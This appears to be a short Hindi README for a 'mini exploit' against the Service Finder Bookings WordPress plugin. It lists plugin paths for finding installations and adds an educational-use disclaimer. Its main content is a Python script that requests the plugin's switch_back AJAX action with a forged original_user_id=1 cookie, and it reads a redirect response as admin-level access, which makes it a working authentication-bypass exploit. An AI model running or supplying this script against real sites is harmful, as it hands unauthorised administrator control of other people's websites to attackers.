
एक मिनी एक्सप्लॉइट जो Service Finder -Bookings प्लगइन WP के लिए है
Service Finder प्लगइन वर्डप्रेस के लिए एक बुकिंग और सेवा प्रबंधन प्रणाली है।
अपनी लोकप्रियता और जटिलता के कारण, कुछ संस्करणों में अनप्रमाणित AJAX एंडपॉइंट्स या अनुचित एक्सेस नियंत्रण से संबंधित सुरक्षा समस्याएँ रही हैं।
यह README बताता है कि शोधकर्ता कैसे सुरक्षित रूप से इंस्टॉलेशन की पहचान कर सकते हैं और नैतिक प्रथाओं का पालन कर सकते हैं (dbr krk)।
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ अस्वीकरण:
ये खोजें केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए हैं। अनधिकृत पहुँच या शोषण का प्रयास न करें।
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ असुरक्षित! एडमिन पैनल पर एडमिन के रूप में रीडायरेक्ट400-499: ⚠️ क्लाइंट त्रुटि — अनुरोध अमान्य या अनधिकृत था, असुरक्षित नहीं